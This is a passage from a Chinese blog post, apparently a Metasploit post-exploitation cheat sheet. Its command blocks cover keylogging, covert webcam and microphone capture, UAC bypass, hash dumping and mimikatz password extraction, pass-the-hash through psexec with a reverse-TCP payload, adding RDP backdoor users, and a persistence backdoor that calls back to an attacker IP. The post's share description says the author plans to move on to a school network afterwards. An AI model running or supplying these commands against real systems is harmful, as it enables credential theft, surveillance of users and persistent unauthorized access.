<h4 id="利用arp-scanner、portscan等进行扫描"><a href="#利用arp-scanner、portscan等进行扫描" class="headerlink" title="利用arp_scanner、portscan等进行扫描"></a>利用arp_scanner、portscan等进行扫描</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/gather/arp_scanner RHOSTS=<span class="number">192.168</span><span class="number">.183</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line">run auxiliary/scanner/portscan/tcp RHOSTS=<span class="number">192.168</span><span class="number">.183</span><span class="number">.146</span> PORTS=<span class="number">3389</span></span><br></pre></td></tr></table></figure>

<h4 id="Socks代理"><a href="#Socks代理" class="headerlink" title="Socks代理"></a>Socks代理</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/server/socks4a</span><br><span class="line">set srvhost <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">set srvport <span class="number">2000</span></span><br><span class="line">run</span><br><span class="line"><span class="comment"># 然后vim /etc/proxychains.conf ，在文件末尾添加socks4代理服务器</span></span><br><span class="line">socks4 <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">2000</span></span><br><span class="line">proxychains nmap -Pn -sT <span class="number">192.168</span><span class="number">.80</span><span class="number">.129</span> -p1-<span class="number">1000</span>   <span class="comment">#proxychains代理访问执行nmap操作</span></span><br></pre></td></tr></table></figure>

<h4 id="键盘记录"><a href="#键盘记录" class="headerlink" title="键盘记录"></a>键盘记录</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyscan_start  <span class="comment"># 开始键盘记录</span></span><br><span class="line">keyscan_dump   <span class="comment"># 导出记录数据</span></span><br><span class="line">keyscan_stop   <span class="comment"># 结束键盘记录</span></span><br></pre></td></tr></table></figure>

<h4 id="网络摄像头"><a href="#网络摄像头" class="headerlink" title="网络摄像头"></a>网络摄像头</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">record_mic　 <span class="comment"># 音频录制</span></span><br><span class="line">webcam_chat  <span class="comment"># 开启视频聊天(对方有弹窗）</span></span><br><span class="line">webcam_list  <span class="comment"># 查看摄像头</span></span><br><span class="line">webcam_snap  <span class="comment"># 通过摄像头拍照</span></span><br><span class="line">webcam_stream  <span class="comment"># 通过摄像头开启视频监控(以网页形式进行监控≈直播）</span></span><br></pre></td></tr></table></figure>

<h4 id="截屏"><a href="#截屏" class="headerlink" title="截屏"></a>截屏</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">screenshot  <span class="comment"># 截屏</span></span><br><span class="line">use espia  <span class="comment"># 使用espia模块</span></span><br><span class="line">screengrab  <span class="comment"># 截屏</span></span><br></pre></td></tr></table></figure>

<h4 id="绕过UAC提权"><a href="#绕过UAC提权" class="headerlink" title="绕过UAC提权"></a>绕过UAC提权</h4><p>msf内置一些bypassuac脚本，原理不同，使用方法类似，执行后返回一个新的会话，执行getsystem即可提权</p>
<figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">exploit/windows/local/bypassuac</span><br><span class="line">exploit/windows/local/bypassuac_eventvwr</span><br><span class="line">exploit/windows/local/bypassuac_injection</span><br><span class="line">exploit/windows/local/bypassuac_injection_winsxs</span><br><span class="line">exploit/windows/local/bypassuac_silentcleanup</span><br><span class="line">exploit/windows/local/bypassuac_vbs</span><br><span class="line"></span><br><span class="line">use exploit/windows/local/bypassuac</span><br><span class="line">set session <span class="number">1</span></span><br><span class="line">run</span><br><span class="line">getsystem</span><br></pre></td></tr></table></figure>

<h4 id="窃取hash及密码-amp-哈希传递"><a href="#窃取hash及密码-amp-哈希传递" class="headerlink" title="窃取hash及密码&amp;哈希传递"></a>窃取hash及密码&amp;哈希传递</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 窃取hash及密码</span></span><br><span class="line">hashdump</span><br><span class="line">run post/windows/gather/smart_hashdump</span><br><span class="line">得到的hash可以拿去https://cmd5.com/ 解密一下即是用户密码</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#mimikatz</span></span><br><span class="line">load mimikatz <span class="comment"># 加载mimikatz模块</span></span><br><span class="line">msv  <span class="comment"># 获取用户和hash值 </span></span><br><span class="line">kerberos  <span class="comment"># 获取内存中的明文密码信息</span></span><br><span class="line">wdigest  <span class="comment"># 获取内存中的明文密码信息</span></span><br><span class="line">mimikatz_command -f a:: <span class="comment"># 需要以错误的模块来让正确的模块显示</span></span><br><span class="line">mimikatz_command -f sekurlsa::searchPasswords <span class="comment"># 获取用户密码</span></span><br><span class="line">mimikatz_command -f samdump::hashes  <span class="comment"># 执行用户hash</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#哈希传递</span></span><br><span class="line"><span class="comment">#利用hashdump得到用户的hash后可利用psexec模块进行哈希传递攻击。</span></span><br><span class="line">使用psexec的前提：SMB服务必须开启，也就是开启<span class="number">445</span>端口；Admin$可以访问</span><br><span class="line">use exploit/windows/smb/psexec</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set LHOST <span class="number">192.168</span><span class="number">.183</span><span class="number">.147</span></span><br><span class="line">set LPORT <span class="number">443</span></span><br><span class="line">set RHOST <span class="number">192.168</span><span class="number">.183</span><span class="number">.154</span></span><br><span class="line">set SMBUSER Administrator</span><br><span class="line">set SMBPASS ccf**4ee:3db**<span class="number">678</span></span><br><span class="line">set SMBDOMAIN  WORKGROUP   <span class="comment"># 域用户需要设置SMBDOMAIN</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="RDP"><a href="#RDP" class="headerlink" title="RDP"></a>RDP</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#getgui命令</span></span><br><span class="line"><span class="comment">#这里需要注意的是通过getgui命令，虽然可以成功添加用户，但是没有权限远程登录桌面，这里推荐使用enable_rdp脚本添加。</span></span><br><span class="line">run getgui –h  <span class="comment"># 查看帮助</span></span><br><span class="line">run getgui -e  <span class="comment"># 开启远程桌面</span></span><br><span class="line">run getgui -u admin -p admin  <span class="comment"># 添加用户</span></span><br><span class="line">run getgui -f <span class="number">6666</span> -e  <span class="comment"># 3389端口转发到6666</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#enable_rdp脚本</span></span><br><span class="line"><span class="comment">#通过enable_rdp脚本将用户添加到远程桌面用户组和管理员用户组</span></span><br><span class="line">run post/windows/manage/enable_rdp  <span class="comment">#开启远程桌面</span></span><br><span class="line">run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin <span class="comment"># 添加用户</span></span><br><span class="line">run post/windows/manage/enable_rdp FORWARD=true LPORT=<span class="number">6667</span>  <span class="comment"># 将3389端口转发到6667</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#远程桌面</span></span><br><span class="line">enumdesktops  <span class="comment"># 查看可用的桌面</span></span><br><span class="line">getdesktop    <span class="comment"># 获取当前meterpreter 关联的桌面</span></span><br><span class="line">setdesktop    <span class="comment"># 设置meterpreter关联的桌面  -h查看帮助</span></span><br><span class="line">run vnc   <span class="comment"># 使用vnc远程桌面连接</span></span><br><span class="line">rdesktop <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">1111</span> <span class="comment"># 需要输入用户名密码连接</span></span><br><span class="line">rdesktop -u Administrator -p <span class="number">123</span> <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">1111</span> <span class="comment"># -u 用户名 -p 密码</span></span><br></pre></td></tr></table></figure>

<h4 id="后门植入"><a href="#后门植入" class="headerlink" title="后门植入"></a>后门植入</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Persistence(通过启动项安装)</span></span><br><span class="line">run persistence –h  <span class="comment"># 查看帮助</span></span><br><span class="line">run persistence -X -i <span class="number">5</span> -p <span class="number">4444</span> -r <span class="number">192.168</span><span class="number">.183</span><span class="number">.147</span> </span><br><span class="line">run persistence -U -i <span class="number">5</span> -p <span class="number">4444</span> -r <span class="number">192.168</span><span class="number">.183</span><span class="number">.147</span> -L c:\\Windows\\System32</span><br><span class="line">-X：设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限原因会导致添加失败，后门无法启动。因此在非管理员权限下，不推荐使用该参数</span><br><span class="line">-U：设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息</span><br><span class="line">-L：后门传到远程主机的位置默认为%TEMP%</span><br><span class="line">-i：设置反向连接间隔时间为<span class="number">5</span>秒</span><br><span class="line">-p：设置反向连接的端口号</span><br><span class="line">-r：设置反向连接的ip地址</span><br></pre></td></tr></table></figure>
  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">Writing</a></li>
         
          <li><a href="/music">Music</a></li>
         
          <li><a href="/about">关于</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#网络拓扑"><span class="toc-number">1.</span> <span class="toc-text">网络拓扑</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#环境搭建"><span class="toc-number">2.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#拿下跳板以及端口转发"><span class="toc-number">3.</span> <span class="toc-text">拿下跳板以及端口转发</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#获取内网win7的shell"><span class="toc-number">4.</span> <span class="toc-text">获取内网win7的shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#常用命令总结"><span class="toc-number">5.</span> <span class="toc-text">常用命令总结</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#execute执行文件"><span class="toc-number">5.0.1.</span> <span class="toc-text">execute执行文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#migrate进程迁移"><span class="toc-number">5.0.2.</span> <span class="toc-text">migrate进程迁移</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#clearev清除日志"><span class="toc-number">5.0.3.</span> <span class="toc-text">clearev清除日志</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#timestomp伪造时间戳"><span class="toc-number">5.0.4.</span> <span class="toc-text">timestomp伪造时间戳</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#portfwd端口转发"><span class="toc-number">5.0.5.</span> <span class="toc-text">portfwd端口转发</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#autoroute添加路由"><span class="toc-number">5.0.6.</span> <span class="toc-text">autoroute添加路由</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用arp-scanner、portscan等进行扫描"><span class="toc-number">5.0.7.</span> <span class="toc-text">利用arp_scanner、portscan等进行扫描</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Socks代理"><span class="toc-number">5.0.8.</span> <span class="toc-text">Socks代理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#键盘记录"><span class="toc-number">5.0.9.</span> <span class="toc-text">键盘记录</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#网络摄像头"><span class="toc-number">5.0.10.</span> <span class="toc-text">网络摄像头</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#截屏"><span class="toc-number">5.0.11.</span> <span class="toc-text">截屏</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#绕过UAC提权"><span class="toc-number">5.0.12.</span> <span class="toc-text">绕过UAC提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#窃取hash及密码-amp-哈希传递"><span class="toc-number">5.0.13.</span> <span class="toc-text">窃取hash及密码&amp;哈希传递</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#RDP"><span class="toc-number">5.0.14.</span> <span class="toc-text">RDP</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#后门植入"><span class="toc-number">5.0.15.</span> <span class="toc-text">后门植入</span></a></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://alpha302.github.io/2019/10/28/msfconsole/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://alpha302.github.io/2019/10/28/msfconsole/&text=msf多层内网穿透(基础篇)"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://alpha302.github.io/2019/10/28/msfconsole/&is_video=false&description=msf多层内网穿透(基础篇)"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=msf多层内网穿透(基础篇)&body=Check out this article: https://alpha302.github.io/2019/10/28/msfconsole/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://alpha302.github.io/2019/10/28/msfconsole/&name=msf多层内网穿透(基础篇)&description=&lt;p&gt;先模拟多层内网，摸清后渗透的使用，再从学校入手。&lt;br&gt;内网渗透test&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 wang
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">Writing</a></li>
         
          <li><a href="/music">Music</a></li>
         
          <li><a href="/about">关于</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/fontawesome-all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

